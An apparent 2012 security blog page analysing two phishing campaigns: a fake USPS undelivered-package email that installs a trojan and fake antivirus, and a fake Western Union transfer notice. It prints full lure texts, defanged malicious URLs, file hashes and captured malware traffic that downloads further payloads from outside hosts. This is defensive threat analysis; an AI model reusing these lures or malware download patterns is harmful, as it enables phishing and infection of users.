(harmonic:security): August 2012

Thursday, August 30, 2012

No, USPS Did Not Fail to Deliver a Package This Week

Started receiving alerts claiming to be from the USPS concerning a package that could not be delivered.

This is a new take on an old trick, and a 'low-budget' one at that. Whatever the case, this email is also very much malicious. My fully patched Windows 7 sandbox was quickly popped by the bug without any effort. It also did not seem to matter that the user-id was had only limited user privileges and I received no UAC approval window when it was triggered. Very disturbing.

There's no visible text in the email when displayed as HTML. But there is hidden text in the background that is probably intended to make the message appear legitimate to spam filters. The text itself appears to be pulled from 3 novels which have long since found their way into the public domain:

From "Artemus Ward (his travels) among the Mormons, Part 1" by John Camden Hotten (originally published in 1865)

. . .Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. . .

From "A Fleece of Gold: Five Lessons from the Fable of Jason and Golden Fleece" by Charles Steward Given (originally published in 1905)

. . .Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. . .

From "The Entire PG Works by George Meredith, Volume 1 of 10" by George Meredith (originally published in 1851)

. . .Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. . .

I wonder how the original email author came upon these three distinctly different novels as even in an internet connected world, it seems unlikely that these are just the result of a "What novels should I quote to bypass spam filters?" Google search

That said, the user only sees a low quality jpg image (pulled from http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/HIDVRTXUKI [DOT] jpg) when they open the message claiming that USPS failed to deliver a package. . .

USPS.COM
Unfortunately, we failed to deliver the postal package you have sent on the 27th of august in time, because the recipient's address is erroneous.

Please go to the nearest UPS office and show your shipping label.

If the parcel isn't received within 30 working days our company will have the right claim compensation from you for each day of keeping.

Low quality JPG referring to a phantom parcel

Low quality JPG referring to a phantom parcel

Not sure why I would be taking a USPS/United States Postal Service receipt to a UPS/United Parcel Service office, but whatever.

Clicking on the image sends the user to http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm, which has only a very simple javascript within commanding the browser to download a file named Label_Copy_USPS [DOT] zip. . .

Javascript to download the Label_Copy_USPS file

Javascript to download the Label_Copy_USPS file

The zip file itself contains a malicious file named Label_Copy_USPS [DOT] exe, with an embeded icon that makes it look like a MSWord document to the untrained eye.

Not really a word document, no matter what it says

Not really a word document, no matter what it says

Unique File Details:
Filename -- Label_Copy_USPS [DOT] exe
File size -- 88576 bytes (86.5 KB)
Filetype -- PE32 executable for MS Windows (GUI) Intel 80386 32-bit (Win32 Executable Generic)
MD5 Hash -- 7c35f845a49f95e6797ee89073cf1d89
SHA1 Hash -- 8dc099b23270b70a42dad714a230c4b51eb06175
SHA256 Hash -- 254dd09af71c45cbad147aa523cf7f277340c1e0799fba9b36f20942f295c63d

Online malware scanners identified the file as:
AntiVir -- TR/Crypt.ZPACK.Gen
Avira -- TR/Crypt.ZPACK.Gen
Eset -- Win32/Kryptik.ALDT (Variant)
F-Prot -- W32/Falab.J6.gen!Eldorado
Kaspersky Lab -- Trojan-Downloader.Win32.Kuluoz.ar
McAfee -- Generic BackDoor.adp
Norman -- W32/Obfuscated.D!genr
Sophos -- Mal/EncPk-AGK

The file also appears to have authentic metadata information, though it could just as easily be another misdirect.

File Description: Fatal Hums 32
Company: EPoX
File Version: 2.2.0.1112
Date Created: 8/30/2012 6:57 AM
Size: 86.5 KB

Opened the file in the sandbox and confirmed it's malicious nature.

It appears to execute, but doesn't display anything but an empty document in notepad named "Label_Copy_USPS". Not sure if that's just for appearance, or if it's exploiting something in notepad on my fully patched sandbox machine.

Just an empty notepad document

The Label_Copy_USPS.exe file with the MSWord icon has also been replaced with an empty text file named Label_Copy_USPS.txt.

After that, nothing else. At least for a few minutes.

Then I get a popup for something called Security Monitor claiming:

Security Monitor: WARNING!

Attention! System detected a potential hazard (TrojanSPM/LX) on your computer
that may infect executable files. Your private information and PC Safety
is at risk.
To get rid of unwanted spyware and keep your computer safe you need to update your computer security software.
Click Yes to download official intrusion detection system (IDS software)

Bogus Security Monitor Warning

Followed by an ominous systemtray flag. . .

WARNING!
Application cannot be executed. The file notepad.exe is infected.

Please activate your antivirus software.

Bogus Infected File Flag

And then conveniently a scan from Live Security Platinum (one of the Fake Antivirus variants) which I of course didn't knowingly install. . .

Live Security Platinum (one of the Fake Antivirus variants)

I've seen these before, and it always amuses me how it claims certain applications are infected on machine (even though they are not actually installed)

But whatever the case, it throws the expected "Your machine is infected with many malicious bugs, It is highly recommended that you remove all the threats from your computer immediately" message.

Bogus Infected Machine Warning

And of course clicking on the button takes the user to an online website asking for a credit card number.

Basically anything that I did on the machine from this point on triggered an alert claiming that whatever application I was trying to open was infected, right after the process was terminated for my 'safety'

But that's not all that's going on. . .

Behind the scenes, this all starts with a HTTP connection on TCP84 to a Netherlands IP (93.184.100.116) and pulled down another malicious exe file named 3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe. . .

GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=run&u=/get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exeGET //get/3b0c6a8305cc89cf77f3c9616a569e78 [DOT] exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Host: 93.184.100.116:84
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:53:14 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Thu, 30 Aug 2012 20:30:04 GMT
ETag: "ddc0f1-66a00-4c8818a54eb00"
Accept-Ranges: bytes
Content-Length: 420352

MZ......................@...............................................!..L.!This program cannot be run in DOS mode. [FILE CONTINUES]

And then it pulls yet another malicious file, passF [DOT] dll [DOT] crp. . .

GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37B8ED45222F5F57F5006B4F30287DE5E832CD19BA0C26553344C35D1833C79DC573864758807A47C3CED5B939DECA6688F364B7F8C HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 49

c=rdl&u=/get/passF.dll.crp&a=0&k=00005f73&n=passFGET //get/passF.dll.crp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 93.184.100.116:84

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Thu, 30 Aug 2012 20:55:18 GMT
Content-Type: application/x-msdos-program
Connection: keep-alive
Last-Modified: Fri, 24 Aug 2012 12:47:50 GMT
ETag: "ddc0f8-1a9e00-4c80262356980"
Accept-Ranges: bytes
Content-Length: 1744384

>...p_..w_......._..s_..3_..s_..s_..s_..s_..s_..s_..s_..s_..{^..}@..s...R..L.~Th., p.0gr.2 c.1no..beS-unS6n 7.S .0de]R

W_..s_..+...oO..oO..[FILE CONTINUES]

And because that clearly wasn't enough, it connects to Hong Kong (175.41.28.156) to log itself as 'installed'. . .

GET /api/stats/install/?ts=26070510&affid=41100&ver=3060001&group=liv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent:
Host: 175.41.28.156

HTTP/1.1 200 OK
Server: nginx/1.2.3
Date: Thu, 30 Aug 2012 20:56:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive

Then the bug downloads silently completes a form in Kazakhstan (195.210.47.109) and downloads a spam email template. . .

POST /index.php HTTP/1.1
Host: 195.210.47.109:80:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 746

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
0549571111555245

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
13849612

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 30 Aug 2012 20:56:30 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
f4a

HTTP/1.1 200 OK
Date: Thu, 30 Aug 2012 20:56:29 GMT
Server: Apache/2.2.16
Content-Length: 55876
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream

'hr.%+./".,****...)/.'4hr.%.'ywtxp%.'m%.***.'4m%.'h%**/5)+)5)/,5*#)!#/.*,(5)(+5*(*5*-#!#/.*,(5##5.5(!#+.*##5*(#5".5*((!#/.)+(5*(+5*)"5.#!#/.)+"5)+5,#5)/*!#/.-#5*,(5*#)5*)#!#/.,)5..[FILE CONTINUES]

Once downloaded, the sandbox becomes a mailzombie and starts blasting the world. . .

Meanwhile. . . the bug is also trying to pull down more badness from Germany (78.159.108.83). . .

GET /ajax/libs/jquery/1.6.4/jquery [DOT] min [DOT] js HTTP/1.1
Accept: */*
Referer: http://chechoutbiz [DOT] com/p/liv/?group=liv&ver=3060001&reject_url=http%3A%2F%2Fchechoutbiz [DOT] com%3A80%2Fp%2Fdecline%2F%3Fgroup%3Dliv%26ver%3D3060001%26nid%3DD0F7718D%26affid%3D41100&nid=D0F7718D&affid=41100

Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Connection: Keep-Alive

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Mon, 02 Apr 2012 18:24:28 GMT
Date: Thu, 30 Aug 2012 18:41:47 GMT
Expires: Fri, 30 Aug 2013 18:41:47 GMT
X-Content-Type-Options: nosniff

Server: sffe
Content-Length: 32103
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8101

............y..../....MD...j..v.%`C...-..K..aS.....H.Zr......SU(......}...(.j=u.:K.i.l...|....U.?{..M..M...........C.p.-..2.W...i.....U./.+?VIpo...[?.....v.:....O.*[.Q.0...j...?l.(..<[FILE CONTINUES]

And then yet another file from Missouri (209.20.78.241) via TCP84. . .

GET /d0f7718d96B962A24D5DB24495EF4073722C70A2F37280D51B2FB5E0240E44F8B14D849155C63ADBC2A2CA31 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 209.20.78.241:84

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 30 Aug 2012 21:03:11 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
Content-Length: 225

..9.......Q0.r+..W..As..yP........k....mEq.v..j!...fg.@.o?.Y....|.4rh.....5^.....{.j..q.SK.q.....U..........'2.e9..IrKJe.,zSo/..o.a8_.cf.......~(MD.+.P.........f...?......M..^{Q.|.f...@.;.%Y.(.K..8PF..S..\l.%..W..v.&8a.KR....

And then back to Germany (slopokan21 [DOT] ru) to fill out another online form. . .

POST /index [DOT] php HTTP/1.1
Host: slopokan21 [DOT] ru:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 6.1; SV1; .NET CLR 1.1.4777)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 2936

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
2505323811778201

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
14097139

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
137

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
457

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{DAB0CFA5-8A9B-4160-8DA8-8F2A01AC8EF6}

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
6#2#1#0#7601#29

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
758019024:121:2000:0:0:0:25:0:0:0:0:0:0:0:0:0:0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="smtx"
CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000CC000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sr"
0

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ar"
0

--1BEF0A57BE110FD467A--
HTTP/1.0 303 See Other
Location: http://slopokan21 [DOT] ru:80/index [DOT] php
Content-Length: 0
Connection: close
Date: Thu, 30 Aug 2012 21:00:40 GMT

The connections and downloads continue with zero sign of stopping. And again, all of this is taking place silently behind the scenes without the user ever knowing.

Good times

Original source email (minus the HTML formatting):

Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp39528ibe;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received: by 10.50.236.39 with SMTP id ur7mr1239726igc.62.1346345530047;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Return-Path:
Received: from mailforward. (mailforward.. [10.10.10.23])
by mx. with ESMTP id i2si3576532icy.69.2012.08.30.09.52.09;
Thu, 30 Aug 2012 09:52:10 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) client-ip=10.10.10.23;
Authentication-Results: mx.; spf=neutral (: 10.10.10.23 is neither permitted nor denied by best guess record for domain of www@suzan.yourwebhost [DOT] com) smtp.mail=www@suzan.yourwebhost [DOT] com
Received: from mx1. (inbound-us1. [70.87.28.133])
by mailforward. (Postfix) with ESMTP id 72C0E162C3C6
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: from suzan.yourwebhost [DOT] com (suzan [DOT] yourwebhost [DOT] com [209.239.43.1])
by mx1. (Postfix) with ESMTP id 58343471681
for ; Thu, 30 Aug 2012 16:52:09 +0000 (GMT)
Received: (from www@localhost)
by suzan.yourwebhost [DOT] com (8.14.3/8.12.10) id q7UGq3Uc015428;
Thu, 30 Aug 2012 12:52:03 -0400
Date: Thu, 30 Aug 2012 12:52:03 -0400
Message-Id: <201208301652 .q7ugq3uc015428=".q7ugq3uc015428" com="com" suzan="suzan" yourwebhost="yourwebhost">
To: christoperj
Subject: Delivery refuse ID#36556
From: "USPS Customer Service"
X-Mailer: CF-XPInformer
Reply-To: "USPS Customer Service"
Mime-Version: 1.0
Content-Type:multipart/mixed;boundary="----------1346345523503F9A33361C5"
X-CTCH-Spam: Suspect
X-CTCH-VOD: Unknown
X-CTCH-RefID: str=0001.0A0B0209.503F9A39.0103,ss=2,re=0.000,recu=0.000,reip=0.000,cl=2,cld=1,fgs=0

------------1346345523503F9A33361C5

[LINK TO http://bdedieu [DOT] perso [DOT] neuf [DOT] fr/XREOWCDHOS [DOT] htm" USING IMAGE FILE POINTING TO http://bdedieu [DOT] perso.neuf [DOT] fr/HIDVRTXUKI [DOT] jpg"]

There are no ravishingly beautiful women present, and no positively ugly ones.The men are fair to middling. They will never be slain in cold blood for their beauty, nor shut up in jail for their homeliness. There are some good voices in the choir to-day, but the orchestral accompaniment is unusually slight. Sometimes they introduce a full brass and string band in Church. Brigham Young says the devil has monopolized the good music long enough, and it is high time the Lord had a portion of it. Therefore trombones are tooted on Sundays in Utah as well as on other days; and there are some splendid musicians there. The Orchestra in Brigham Youngs theatre is quite equal to any in Broadway. There is a youth in Salt Lake City (I forget his name) who plays the cornet like a North American angel. Mr. Stenhouse relieves me of any anxiety I had felt in regard to having my swan-like throat cut by the Danites, but thinks my wholesale denunciation of a people I h!
ad never seen was rather hasty.

And the plaudits of men and of angels attend the young man today who has a worthy object in view, who believes in himself, and bends to the oars with might and main.An active hand symbolizes usefulness and thrift. Has it ever occurred to you what a wonderful piece of mechanism is that hand with which Nature has equipped you for seizing the oars of lifes activities? Galen, the famous anatomist, after a prolonged study of the human hand, conceiving it to be the proximate instrument of the soul, was forced to renounce atheism, to acknowledge the existence of a Supreme Being. Scientists regard the human hand as being the most remarkable organ, not vital, in the whole animal kingdom. It is conceded to be, also, the most pronounced physical characteristic differentiating man from the lower animals. The chimpanzee and the gorilla, closely allied to the human species in many respects, are noticeably deficient in the use of their modified hands; being able to grasp things only in a c!
umbersome way.

Tongue out of mouth trotted the little dog after him; crouched panting when he stopped an instant; rose weariedly when he started afresh.Now and then a large white night-moth flitted through the dusk of the forest. On a barren corner of the wooded highland looking inland stood grey topless ruins set in nettles and rank grass-blades. Richard mechanically sat down on the crumbling flints to rest, and listened to the panting of the dog. Sprinkled at his feet were emerald lights: hundreds of glow- worms studded the dark dry ground. He sat and eyed them, thinking not at all. His energies were expended in action. He sat as a part of the ruins, and the moon turned his shadow Westward from the South. Overhead, as she declined, long ripples of silver cloud were imperceptibly stealing toward her. They were the van of a tempest. He did not observe them or the leaves beginning to chatter.

------------1346345523503F9A33361C5--

No, I Do Not Have a Confirmed Money Transfer from Western Union

Received a new version (well, received several times actually) of the old Western Union Money Transfer scam in the last 48 hours.

This latest derivative comes across as an authentic looking email from "2012, Western Union" thanking me (or more specifically, a random name that isn't actually me) for using the Western Union Money Transfer service. The email goes on to say that a credit of several hundred dollars is ready for me to pickup. All I have to do is to click on a link for the transaction details.

And as a bonus -- I have also earned Western Union Gold Points for the transaction. I like bonuses. I wonder if I can convert them to airline miles?

Regardless -- like all the versions that came before, this latest incarnation is clearly fake and appears to have been sent with malicious intent.

All of the emails appear to be an attempt to trick the reader into clicking on a variety of non-Western Union links peppered throughout the messages.

None of the links I found in the messages I received were working when I tested.

These links threw an immediate 404 --

http://www [DOT] fantallenatori [DOT] com/pUcAJCR5/index [DOT] html

http://www [DOT] fantallenatori [DOT] com/uAu1GZ1V/index [DOT] html=

http://www [DOT] fantallenatori [DOT] com/6E3eDXLg/index [DOT] html

http://quevenderparaganardinero [DOT] com/ZYbjfFiB/index [DOT] htm

http://quevenderparaganardinero [DOT] com/psdr66QH/index [DOT] html

Weirdly, this single link threw an authentication challenge from www [DOT] pictoo [DOT] de:80 --

http://www [DOT] pictoo [DOT] de/5TpLpTTy/index [DOT] html

These links attempted to redirect to http:// 69.163.40.128 /pxyk80ujzb03h [DOT] php?y=p7tqagmzf8qdjqpi (which also threw a dead 404 error from a nginx v0.7.67 server) --

http://doctorraulseveriche [DOT] com/N9SvVNHj/index [DOT] html

http://inove [DOT] imb [DOT] br/oRVx4RJW/index [DOT] html

http://6-engel [DOT] com/7KwgSTdk/index [DOT] html

http://afistan [DOT] com/TwWrw4T9/index [DOT] html

http://academiaplataforma [DOT] com [DOT] br/EsRMFkkp/index [DOT] html

But during the redirect, it threw a "WAIT PLEASE Loading. . ." message in a format I've seen previously used to send the visitor to a website serving automated exploits back to the visiting user's machine.

It's possible these 5 specific links might be working at a later time with just a simple DNS update pointing the redirect to another live host.

Good times

Screenshot of an example email:

Yep, this Western Union email is clearly fake

Yep, this Western Union email is clearly fake

Text of an example email (minus the html formatting):

Delivered-To: christoperj
Received: by 10.231.42.212 with SMTP id t20csp22737ibe;
Thu, 30 Aug 2012 05:54:32 -0700 (PDT)
Received: by 10.42.18.193 with SMTP id y1mr4641886ica.0.1346331271484;
Thu, 30 Aug 2012 05:54:31 -0700 (PDT)
Received-SPF: neutral (: 10.10.10.23 is neither permitted nor denied by domain of commerciale@eurocina.it) client-ip=10.10.10.23;
Received: by 10.64.35.42 with POP3 id e10mf1997265iej.8;
Thu, 30 Aug 2012 05:54:30 -0700 (PDT)
Return-Path:
Delivered-To:
Received: from mx1 ([10.10.10.23])
by mss-us12 (Dovecot) with LMTP id MNheK7NhP1BXIwAAkZ4h7A
for ; Thu, 30 Aug 2012 12:51:09 +0000
Received: from srv534004-1.cloud.colt-engine.it (srv534004-1.cloud.colt-engine.it [81.31.148.114])
by mx1 (Postfix) with ESMTP id 442AB4715AB
for ; Thu, 30 Aug 2012 12:51:09 +0000 (GMT)
Received: from 85-250-70-7.bb.netvision.net.il ([85.250.70.7] helo=eurocina.it)
by srv534004-1.cloud.colt-engine.it with esmtpsa (TLSv1:AES256-SHA:256)
(Exim 4.76)
(envelope-from )
id 1T74CM-0002Od-2o; Thu, 30 Aug 2012 14:50:14 +0200
Message-ID: <337f2ff7 .43d9abdf=".43d9abdf" eurocina.it="eurocina.it">
Date: Thu, 30 Aug 2012 14:50:17 +0200
Reply-To: "2012, Western Union"
From: "2012, Western Union"
X-Accept-Language: en-us
MIME-Version: 1.0
To:
Subject: Western Union: Confirmed money transfer
Content-Type: text/html;
charset="us-ascii"
Content-Transfer-Encoding: 7bit

Dear Melanie Gibb,

Thank you for using the Western Union Money Transfer service

Your money transfer has been authorized, and is now available for pick up by the receiver.

Transfers to certain destinations may be subject to further delay or additional restrictions.

TRANSACTION DETAILS:

Your Money Transfer Control Number [MTCN] is: 7741471847

Please use this number for all inquiries.

Date of Order: 08/13/2012
Time of Order: 3:25 p.m. ET
Total Amount: $200.50
Transaction Type: credit
AUTH CODE: 16985615

Selected Additional Service (s):
No Additional Services selected.

Western Union Gold Card Reward Summary
Western Union Card Number: 43566235
Points Earned: 85
Total Points: 30

Click here for transaction details [LINK TO NON-WESTERN UNION SITE]

YOU EARNED 3 MINUTES OF PHONE TIME! Your time is loaded directly on your card. Calling instructions are on the card back, or dial 888-628-8862 & enter your personal PIN: 233705064231.

You sent the funds, now make it personal!
Record a greeting with your webcam, upload a photo or send a postcard!
Send a free greeting now at http://wugreetings [DOT] com

Check if the receiver has picked up the money transfer. [LINK TO NON-WESTERN UNION SITE]

IN ADDITION TO THE TRANSFER FEE, WESTERN UNION ALSO MAKES MONEY WHEN IT CHANGES YOUR DOLLARS TO PESOS. PLEASE SEE BELOW FOR MORE INFORMATION REGARDING CURRENCY EXCHANGE.

ADEM?S DE LOS CARGOS POR EL SERVICIO DE TRANSFERENCIA, WESTERN UNION TAMBI?N GANA DINERO CUANDO CAMBIA SUS D?LARES A PESOS. POR FAVOR LEA EN LA PARTE INFERIOR M?S INFORMACI?N SOBRE EL CAMBIO DE MONEDA.

THE CURRENCY TO BE PAID OUT AND THE EXCHANGE RATE FOR YOUR TRANSACTION WERE DETERMINED AT THE TIME OF SEND IF LISTED ON YOUR RECEIPT. OTHERWISE, THE EXCHANGE RATE WILL BE SET WHEN THE RECEIVER RECEIVES THE FUNDS. PROTECT YOURSELF FROM CONSUMER FRAUD. BE CAREFUL WHEN A STRANGER ASKS YOU TO SEND MONEY. FOR A COMPLETE COPY OF THE TERMS AND CONDITIONS GOVERNING THIS TRANSACTION AND THE SERVICES YOU HAVE SELECTED PLEASE REVIEW AND PRINT THE TERMS AND CONDITIONS.[LINK TO NON-WESTERN UNION SITE]

REFUNDS. PRINCIPAL REFUNDS and cancellation of the money transfer will be made if payment to the Receiver has not been made when Western Union processes Customers written request. TRANSFER FEE REFUNDS are generally made if funds are not available to the Receiver within Western Unions specified timeframes. Qualifying refunds will be made within 45 days of receipt of Customers valid written request.

LIMITATIONS OF LIABILITY. . IN NO EVENT SHALL WESTERN UNION BE LIABLE FOR DAMAGES FOR DELAY, NONDELIVERY, NONPAYMENT OR UNDERPAYMENT OF ANY SERVICES TRANSACTION, WHETHER CAUSED BY NEGLIGENCE ON THE PART OF ITS EMPLOYEES, SUPPLIERS OR AGENTS OR OTHERWISE, BEYOND THE SUM OF $500 (in addition to refunding the principal amount and the transfer fees), UNLESS THE SENDER HAS OBTAINED A HIGHER LIABILITY LIMIT BY CALLING THE TELEPHONE NUMBER SET FORTH BELOW AND PAYING AN ADDITIONAL CHARGE THEREFOR. IN NO EVENT WILL WESTERN UNION BE LIABLE FOR ANY INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY OR PUNITIVE DAMAGES OR THE LIKE. THESE CONDITIONS CANNOT BE CHANGED OR SUPPLEMENTED ORALLY.

CURRENCY EXCHANGE. Payments will generally be in local currency (except that in certain countries payment may be in U.S. dollars or other alternate currency at participating locations). In addition to the transfer fees applicable to this transaction, a currency exchange rate will be applied. United States currency is converted to foreign currency at an
exchange rate set by Western Union. Any difference between the rate given to Customers and the rate received by Western Union will be kept by Western Union (and its Agents in some cases) in addition to the transfer fees. Please ask a customer service representative for information concerning the currency exchange rate applicable to your transaction. You may also find out
the current foreign exchange rate provided by Western Union to its customers by calling toll-free to 1-800-325-6000.

The transfer fees and the money Western Union (or its Agents) makes when it changes your dollars into foreign currency may vary based upon the payout currency that you select. Some Western Union Agents may offer receivers the choice to receive funds in a currency different from the one you selected. In such instances, Western Union (or its Agents) may make additional money when it changes your funds into the Receiver selected currency.

CAMBIO DE MONEDA. Los pagos se har?n generalmente en moneda local (excepto que en algunos pa?ses el pago puede hacerse en d?lares estadounidenses u otra moneda alternativa en lugares habilitados). Adem?s de los cargos por el servicio de transferencia establecidos para esta transacci?n, se aplicar? un tipo de cambio de moneda. Para la conversi?n de la moneda de los Estados Unidos a moneda extranjera se aplicar? el tipo de cambio determinado por Western Union. Cualquier diferencia entre el tipo de cambio ofrecido a los clientes y el tipo de cambio obtenido por Western Union, adem?s de los cargos por el servicio de transferencia, corresponder? a Western Union (y sus agentes en algunos casos). Por favor solicite el representante de servicio al cliente que le atienda informaci?n respecto al tipo de cambio de moneda que se va a aplicar a su transacci?n. Usted tambi?n puede solicitar informaci?n sobre el tipo de cambio de moneda extranjera actual que este ofreciendo Western Union a sus clientes, llamando gratuitamente al 1-800-325-4045.

Los cargos por el servicio de transferencia y el dinero que Western Union (o sus Agencias) ganan al cambiar sus d?lares a moneda extranjera pueden variar de acuerdo a la moneda de pago que usted seleccione. Algunas localidades de agentes de Western Union pueden ofrecer al Destinatario la elecci?n de recibir el dinero en una moneda diferente a la que usted seleccion?. En tales casos, Western Union (o sus agentes) pueden ganar dinero adicional cuando cambien su dinero a la moneda elegida por el Destinatario.

WESTERN UNION PRIVACY POLICIES: Western Union may disclose your personal information to third parties as explained in its Privacy Statement ("Statement"). To obtain a copy of the Statement, ask your Western Union Agent or call 1-800-562-2598. Information disclosed may include financial background; identification, such as name and address; transaction information; and other information relating to financial matters. Recipients may include financial institutions; retailers; companies that process
transactions or provide other services for us; government agencies; and direct marketers. You may opt out of (direct us not to make) certain disclosures. If you do not opt out, we will assume that you agree that your
information may be used as the Statement describes. To opt out, call 1-800-562-2598.

We value your opinion! Go to [LINK TO NON-WESTERN UNION SITE, masked as westernunion [DOT] com] to tell us about our service. Survey code : 2879429247.

